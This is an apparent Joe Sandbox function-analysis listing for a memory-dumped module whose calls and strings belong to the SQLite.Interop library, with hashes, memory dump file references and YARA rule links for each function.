Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.$Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$table schemas do not match
API String ID: 2647412588-4182254272
Opcode ID: b8b6b97cb9da47d8d8fff96b09705e3b0995842512c4dccd52e80ac05b186879
Instruction ID: e76e0159f32935b7186745fb914bf3b3b17a66b6b1c6950f591920d42617c8e1
Opcode Fuzzy Hash: b8b6b97cb9da47d8d8fff96b09705e3b0995842512c4dccd52e80ac05b186879
Instruction Fuzzy Hash: 7391A0B56143019FD300CF69D881A1BB7E5BFC8358F04496CF9999B341E779EA05CBA2

Function 6BCE1B80 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1BAB
SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,unopened), ref: 6BCE1C78
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A67E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCE1C96

Strings

%s at line %d of [%.10s], xrefs: 6BCE1BA4, 6BCE1C8F
API call with %s database connection pointer, xrefs: 6BCE1C71
invalid, xrefs: 6BCE1C65
unopened, xrefs: 6BCE1C6C
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BCE1B95, 6BCE1C80
misuse, xrefs: 6BCE1B9F, 6BCE1C8A

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unopened
API String ID: 2981141233-3178044766
Opcode ID: e65bde1f618fb96648b3020c60440fc945383b242ebe22757576fc0ebdf1c828
Instruction ID: a4123130cec08fd08c9857ef30b2c22d63286af0b2aa34ff752a72f535b5931f
Opcode Fuzzy Hash: e65bde1f618fb96648b3020c60440fc945383b242ebe22757576fc0ebdf1c828
Instruction Fuzzy Hash: 9A61E4B0511720CBEB019F6DD84AA8677A4BF02719F440068E969DF201F73DD667CBB2

Function 6BC2DE40 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC2DE7E
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DEAB
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DEB7
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC2DEC0
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DF1F
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2DF2B
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC2DF34

Strings

unrecognized character, xrefs: 6BC2E016
out of memory, xrefs: 6BC2DE6D, 6BC2DEC5

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.$_memset
String ID: out of memory$unrecognized character
API String ID: 1480580083-3687618476
Opcode ID: 8f87d7438ed5265e72a5b45a98bc9e47a8340500cec005de23b9664c52266180
Instruction ID: 73a4277e47ad847f45992219ff1ea492ba5b2a3a0e15cbc681b2829ccee1aab7
Opcode Fuzzy Hash: 8f87d7438ed5265e72a5b45a98bc9e47a8340500cec005de23b9664c52266180
Instruction Fuzzy Hash: E9517871A657400BD3218E38980175BB3959F9136CF1406ADF889CB381FB3EEB4683D2

Function 6BC47B40 Relevance: 15.2, APIs: 10, Instructions: 157COMMON

Download Yara Rule

APIs

SIe969e8d8137a8a33.SQLITE.INTEROP ref: 6BC47B56
SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC47B84
SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47B93
SI28687b581b626bbf.SQLITE.INTEROP(?), ref: 6BC47BA6
SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47BE5
SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC47BF8
SI8b0d9e6837e61abc.SQLITE.INTEROP(00000000), ref: 6BC47C13
SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47C85
SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC47CAC
SId95bb14c42234d8e.SQLITE.INTEROP(?), ref: 6BC47D01

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Id95bb14c42234d8e.$I8b0d9e6837e61abc.$I28687b581b626bbf.I94ecb64e9dbb8338.Ie969e8d8137a8a33.Iffb8076c269e2a85.
String ID:
API String ID: 1281124493-0
Opcode ID: 3cc068d63bd3bf2a5795545ef3e4878e30177bdd7ee0a17e2e8eba46ccdc44a5
Instruction ID: 666c1e6ec84cf443841d02d4505947c2529c70a5f841fc30a8b36d250df99444
Opcode Fuzzy Hash: 3cc068d63bd3bf2a5795545ef3e4878e30177bdd7ee0a17e2e8eba46ccdc44a5
Instruction Fuzzy Hash: 42519DB8D11209DFCB04DFA4E8859EEBBB1BF49308F204469D841A7340F739AB15DBA1

Function 6BC560A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005AFD,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC564CB

Strings

%s at line %d of [%.10s], xrefs: 6BC564C4
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC564B5
misuse, xrefs: 6BC564BF

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: dc8dee6d3afb0818b21268ad86f8b2c5e6a87f67536f2d4ee5a659f8f5146d79
Instruction ID: 79860dc2670f36af5bb93be1db4e4cb14c06636d6b0ecf09b65ec323c164f3da
Opcode Fuzzy Hash: dc8dee6d3afb0818b21268ad86f8b2c5e6a87f67536f2d4ee5a659f8f5146d79
Instruction Fuzzy Hash: FED125B1A15B02DFD714CF24D48075AB7B0BF84319F008A69E8698B341E739FA75CB96

Function 6BC57760 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,?,?,?,6BC5B9AD,?), ref: 6BC577A2
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AD42,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC577C0

Strings

%s at line %d of [%.10s], xrefs: 6BC577B9
unknown error, xrefs: 6BC57773, 6BC577CE, 6BC577FA
API call with %s database connection pointer, xrefs: 6BC5779B
invalid, xrefs: 6BC57796
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC577AA
misuse, xrefs: 6BC577B4

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unknown error
API String ID: 2981141233-2151920856
Opcode ID: abd1eca6b57049043e2fdd16dadad14e4ae53a3881d688990593782e0cd33afb
Instruction ID: e45dbee730facbf66e1b389fad02ab246fac28301d9f663566f49d562e7164c7
Opcode Fuzzy Hash: abd1eca6b57049043e2fdd16dadad14e4ae53a3881d688990593782e0cd33afb
Instruction Fuzzy Hash: 23213A736552000BEA164B68A801B9777D5DB40275F04407BE959AF641FA3CEA71C3F9

Function 6BC87000 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 79COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,?,6BC8B55D,00000001), ref: 6BC87029
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A7E4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC87047

Strings

%s at line %d of [%.10s], xrefs: 6BC87040
unable to close due to unfinalized statements or unfinished backups, xrefs: 6BC870A8
API call with %s database connection pointer, xrefs: 6BC87022
invalid, xrefs: 6BC8701D
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC87031
misuse, xrefs: 6BC8703B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 2981141233-354973669
Opcode ID: 4599a3f35b642a82f185dd30499b46fde8746dbdc44c0a1db31170b5994fd4b0
Instruction ID: ed0a4603a4f9c6d38bd72faffb075a35222ce94fb2d94d631e4ac71fe5f5b56d
Opcode Fuzzy Hash: 4599a3f35b642a82f185dd30499b46fde8746dbdc44c0a1db31170b5994fd4b0
Instruction Fuzzy Hash: 96110631765B2427E62057786C06F9B7B854F0172DF040066F99DEF282FB1DD60593E6

Function 6BC50120 Relevance: 14.0, APIs: 9, Instructions: 451COMMON

Download Yara Rule

APIs

SIfc4b758a3d39aef3.SQLITE.INTEROP(?,?,?,?,?), ref: 6BC501C4
SI25d73a5ab4d6cacb.SQLITE.INTEROP ref: 6BC50208
SI25d73a5ab4d6cacb.SQLITE.INTEROP ref: 6BC50233
SI30455e90830ca460.SQLITE.INTEROP(?,?), ref: 6BC502B1
SI558bdfe0e27562ea.SQLITE.INTEROP(?,?), ref: 6BC502D3
SIfc4b758a3d39aef3.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?), ref: 6BC50574

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I25d73a5ab4d6cacb.Ifc4b758a3d39aef3.$I30455e90830ca460.I558bdfe0e27562ea.
String ID:
API String ID: 823083451-0
Opcode ID: f337a301699776b70748a8855339026d76aced7a188e6aa1ac728b155207a997
Instruction ID: 837985efbdd0106d72bed5936b4ef35c30cfcfb2dbb92e34b4b32462bb398bf5
Opcode Fuzzy Hash: f337a301699776b70748a8855339026d76aced7a188e6aa1ac728b155207a997
Instruction Fuzzy Hash: FAF1D7B29193518FD700CF24C89161ABBE5BFC5308F08859DF899D7311E378DA65CBA6

Function 6BC18F70 Relevance: 13.7, APIs: 9, Instructions: 241COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,00000000,00000001,?,?), ref: 6BC19018
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC1907D
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1908A
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC190A1
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC190AE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID:
API String ID: 372259789-0
Opcode ID: 2bb9f44a64483f8af95760f66b6abcb95f75055d181a89fe7af7643c6c352ce0
Instruction ID: b89a9df780aa090a20be75248ea92662100f5e81bdb50d8d30020bb00fbcbf3e
Opcode Fuzzy Hash: 2bb9f44a64483f8af95760f66b6abcb95f75055d181a89fe7af7643c6c352ce0
Instruction Fuzzy Hash: FE8191B1919311AFD300CF68D84195BF7E8BF89718F00862EF848A3201F779E6568BD2

Function 6BC78FA0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 354COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6BC7903D
_memset.LIBCMT ref: 6BC79090
_memset.LIBCMT ref: 6BC791D5
_memset.LIBCMT ref: 6BC792BB

Strings

DELETE, xrefs: 6BC78FCA
ORDER BY without LIMIT on %s, xrefs: 6BC78FCB
Expression tree is too large (maximum depth %d), xrefs: 6BC79064, 6BC790B7, 6BC791FC, 6BC79305, 6BC7933B

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: _memset
String ID: DELETE$Expression tree is too large (maximum depth %d)$ORDER BY without LIMIT on %s
API String ID: 2102423945-20366875
Opcode ID: 03d8ed82f7f1fb26ef551f70e63500fc36df010d130c904e5831b8b8723ff49b
Instruction ID: d3babb1fc38f271dc2b416de74bd4b9583c4cb7971ba93978f04172ee539f6dc
Opcode Fuzzy Hash: 03d8ed82f7f1fb26ef551f70e63500fc36df010d130c904e5831b8b8723ff49b
Instruction Fuzzy Hash: 75C1C070A25710ABC320DF28CC81B1B73E4EF95714F140668F9599B392E7B9EA45CBD2

Function 6BCCB2E0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 283COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END),?,?,?,?), ref: 6BCCB33B

Strings

AND , xrefs: 6BCCB56B
WHERE , xrefs: 6BCCB3DC
IS ?, xrefs: 6BCCB4D2
sqlite_stat1, xrefs: 6BCCB319
SELECT * FROM , xrefs: 6BCCB382
SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END), xrefs: 6BCCB336

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idb45e174afb28e2c.
String ID: AND $ IS ?$ WHERE $SELECT * FROM $SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END)$sqlite_stat1
API String ID: 778684903-197720640
Opcode ID: b8efc795acfb24e57d97d0f677e26d79890a27c15cf1e4b2d0fbd46909fef317
Instruction ID: 4f1ffeb5dbc4463c7c0b8d31ba47c727ad602c95ca6d92925b42b5cbb803087a
Opcode Fuzzy Hash: b8efc795acfb24e57d97d0f677e26d79890a27c15cf1e4b2d0fbd46909fef317
Instruction Fuzzy Hash: 5EA1A1B19183059FD300CF64D881A5BB7E5AFD9318F44896DF99897341F738DA098BA3

Function 6BC458B0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 266COMMON

Download Yara Rule

APIs

SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC458C2
__aulldiv.LIBCMT ref: 6BC4598A
SIdace78b5300c999f.SQLITE.INTEROP(?), ref: 6BC45A10

Strings

%llu, xrefs: 6BC459DE
%llu , xrefs: 6BC45B51
%llu, xrefs: 6BC4594F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Idace78b5300c999f.Iffb8076c269e2a85.__aulldiv
String ID: %llu$%llu$%llu
API String ID: 1680873459-507185057
Opcode ID: ef45ce7d884ff11047fc5a5533bd7d87025653f65612eb2e669c1a341db5485f
Instruction ID: 5371a5d382f7bcb36f27fb300dd55ce95127868089c32cb53b2fda7657636060
Opcode Fuzzy Hash: ef45ce7d884ff11047fc5a5533bd7d87025653f65612eb2e669c1a341db5485f
Instruction Fuzzy Hash: 3391D271A24211AFC700CF28D88196BB7E8FF88718F40495EF99587251E735EB59CBE2

Function 6BC64800 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 266COMMON

Download Yara Rule

APIs

SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,00000001,00000000,00000000), ref: 6BC648AA
SI952d22c6db518ea2.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?), ref: 6BC64924
SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015BE4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC64A7F

Strings

%s at line %d of [%.10s], xrefs: 6BC64A78
(, xrefs: 6BC64B08
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC64A69
misuse, xrefs: 6BC64A73

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.I8c5d6a3d79dd16ae.I952d22c6db518ea2.
String ID: %s at line %d of [%.10s]$($fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 747483182-3128250811
Opcode ID: 0ed8cabd9f729c0f886209e0e342b8eb7a095feeffddd65ece9e9b12b0eecf14
Instruction ID: 6263a217796a0045c2cb554b92ca4b855626018aed21bf1a0357374fb21d8548
Opcode Fuzzy Hash: 0ed8cabd9f729c0f886209e0e342b8eb7a095feeffddd65ece9e9b12b0eecf14
Instruction Fuzzy Hash: D1A13B70A186615FD710CF29C8D0A6ABBE1BFC5755F044699F8A48B342F73CDA05CBA1

Function 6BC24320 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 209COMMON

Download Yara Rule

APIs

SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2454F
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC24558

Strings

remove_diacritics=2, xrefs: 6BC2442E
tokenchars=, xrefs: 6BC24499
separators=, xrefs: 6BC244EB
remove_diacritics=0, xrefs: 6BC243E4
remove_diacritics=1, xrefs: 6BC2439E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: Iaa0f8e0c251cfd1d.
String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
API String ID: 372259789-131617836
Opcode ID: 79f8825b62258fca002d40d1a51b6341f82fada8dccf0b8d222715cdd83867bd
Instruction ID: 8ed432358a54dad04055a3109ad2a4ca93fbfdaf5ca34e64666abdc20d58e03a
Opcode Fuzzy Hash: 79f8825b62258fca002d40d1a51b6341f82fada8dccf0b8d222715cdd83867bd
